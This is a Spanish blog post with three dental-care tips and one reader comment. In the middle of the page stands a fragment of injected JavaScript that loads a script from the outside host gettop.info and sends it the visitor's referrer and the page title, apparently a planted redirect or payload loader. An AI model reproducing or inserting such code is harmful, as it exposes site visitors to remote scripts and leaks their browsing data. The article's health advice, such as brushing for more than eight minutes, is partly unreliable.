Salud y belleza » Salud dental

Formas efectivas para cuidar tus dientes

1 Comentario

La salud dental es tan importante (o más) que cualquier otra. En efecto, aunque muchos subestimen el ejercicio de lavar las piezas dentales, muchas son las problemáticas que vienen cuando no se presta atención a la higiene bucal. Con los años, éstas comienzan a romperse, dañarse, y, así, todo el proceso digestivo se deteriora. Por eso es fundamental, cuidar los dientes. Y, para ello, presentamos tres formas efectivas.

  • Crear el hábito de ir al dentista. ¿Cómo? Sencillo: no hace falta esperar la llegada de algún dolor o síntoma. En cambio, es preciso acudir, como rutina, entre dos y tres veces al año. Así, la prevención sanará cualquier posible herida, antes, incluso, de que aparezca.
  • Lavar los dientes: despacio, pero tranquilo. Que pasa: muchos piensan que el mejor lavado se produce al apretar fuerte las cerdas del cepillo contra las encías. Grave error, pues eso solo provoca inflamación. Lo que se debe hacer es cepillar despacio, de modo relajado, pero por un tiempo mayor a los ocho minutos.
  • No exigir nuestra boca. ¿De que manera se la exige? Abusando de dulces, bebiendo gaseosas excesivamente frías o, incluso, tomando infusiones extremadamente calientes. Así como el azúcar engorda, también tiene un efecto nocivo para los dientes: aún peor, los daña de modo irreparable. La dieta, también funciona en el nivel dental.

s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + ''; }

Más consejos de salud y belleza : , , ,

One Comment »

  • almudena said:

    creo que la gran mayoria de nosotros no cuidamos los dientes como debemos, auqnue no nos damos cuenta de que es una parte super importante de la salud por la boca de ve todo lo bueno o malo que puede haber en la salud, Te orienta de la salud de la persona

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.